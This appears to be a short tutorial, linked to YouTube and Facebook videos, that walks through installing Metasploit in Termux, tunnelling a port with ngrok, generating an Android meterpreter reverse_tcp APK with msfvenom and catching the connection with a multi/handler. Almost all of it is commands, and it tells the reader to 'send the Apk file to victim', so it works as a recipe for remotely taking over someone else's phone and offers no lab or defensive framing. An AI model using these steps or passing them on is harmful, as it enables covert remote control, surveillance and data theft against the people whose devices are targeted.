Part -1 video in Youtube https://youtu.be/QkWk6MHgMbY
Part -2 video in Facebook https://m.facebook.com/story.php?story_fbid=129191911880703&id=103679584431936
Install Metasploit in Termux
- pkg update
- pkg install repo
- pkg install unstable-repo
- pkg install metasploit
- wait for 10-15 mints metasploit successfully installed.
- now open metasploit-framework
- msfconsole
Same steps in all platforms - Termux, Windows10, Kali linux
Run your Ngrok
For Kali Linux [ ./ngrok tcp 4444 ]
For Termux [ ./ngrok tcp 4444 ]
For Windows [ ngrok tcp 4444 ]
after then open new session in termux use multi terminal sessions
after then open new session in termux use multi terminal sessions
Now create payload
Command : msfvenom -p android/meterpreter/reverse_tcp LHOST= ngrokip LPORT= ngrokport R>appname.apk
- Run this command and wait for 2 mints.
- Now payload was created
- Ls command run in same dir check your Apk file
- App saved in $HOME/
- Copy the App to your storage.
- cp appname.apk /storage/emulated/0/DCIM/ (for internal storage)
- cp appname.apk /sdcard/ (for sdcard)
- Now send the Apk file to victim
Now Open Metasploit Framework
- open new session in termux
- msfconsole (if not work give this command msfconsole.bat )
- Now Metasploit framework opened
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set LHOST localhost
- set LPORT 4444
- exploit
- Now started reverse tcp handler : 4444
Now Meterpreter Commands
- Type 'help' to know all commands.